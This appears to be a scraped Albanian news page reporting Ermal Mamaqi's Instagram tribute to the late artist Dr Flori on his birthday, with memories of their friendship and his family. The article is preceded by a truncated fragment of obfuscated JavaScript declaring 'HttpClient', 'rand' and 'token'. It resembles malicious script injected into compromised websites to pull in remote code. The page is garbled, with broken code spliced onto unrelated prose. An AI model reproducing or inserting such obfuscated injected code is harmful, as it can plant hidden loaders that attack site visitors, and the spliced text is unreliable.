;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Mesazh prekës nga Ermal Mamaqi për Dr Florin

By

Dy vite e gjysmë më parë populli shqiptar humbi njërin prej artistëve më të mëdhenjë ndërsa të afërmit e tij humbën mikun më të shtrenjtë të tyre.

I tillë ishte Dr Flori, i cili iku herët nga kjo botë duke lënë vepra mjaft të mira pas vetes të cilat pa pikë dyshimi do të pasqyrojnë mjaft mirë atë se çfarë në realitet ishte ai, një artist i vërtetë.

Sot kur edhe shënohet ditëlindja e tij, familjarët dhe miqtë e afërt po e kujtojnë atë, secili në mënyrën e vet.

Ermal Mamaqi, njëri prej miqëve e bashkëpuntorëve më të afërt të Florit zgjodhi t’a kujtojë atë përmes një statusi në Instagram i cili pak a shum tregon se në ç’baza ishte e ndërtuar miqësia e tyre.

Më mori malli Flor… Shumë pak e dinë sa humor kishe ti. Sa qeshnim. Kushedi sa muzikë do kishim bërë këto vite që mungon.

Më ka marr malli për porositë që bëje në lokal, kur ngatërroje banjon me kuzhinën. Kur merrje lypësit në makinë dhe i blije për të ngrënë. Kur qaje me këngët e Kishës. Kur e ndiqje Pastorin më shumë se çdo pjesëtar tjetër i Kishës.

Më ka marr malli për telefonatat e tua në 3 të natës dhe që pasi unë të pyesja çfarë ka ndodh që merr kaq vonë, ti ma ktheje me pyetje tjeter: – Pse sa është ora?

Më ka marr malli për videot idiote që bënim me Egin. Për koncertet, festivalet, studiot dhe kafet pa mbarim.

Sa plane mbetën përgjysmë. Sa këngë që nuk kam gjetur forcën t’i përfundoj.

Shtëpia me dru që do bënim në Dajt për fëmijët tanë.

Tashmë ti ke një nip që të ngjan më shumë ty se Albanit. I kanë vënë emrin tënd.

Kaltrina po jep shkëndijat e para që mund të eci në hapat e tua. Ndërsa Danieli bëhet çdo ditë e më i zgjuar. Dhe Blerina që vazhdon jeton me prindërit e tu, si të ishin të vetët, si atëherë… Ma do mëndja se po këndon atje lart. Ndoshta je ulur në prehërin e Zotit dhe po këndon.

Kushedi sa bukur do jetë… Më mori malli Flor…

Artikuj të ngjashëm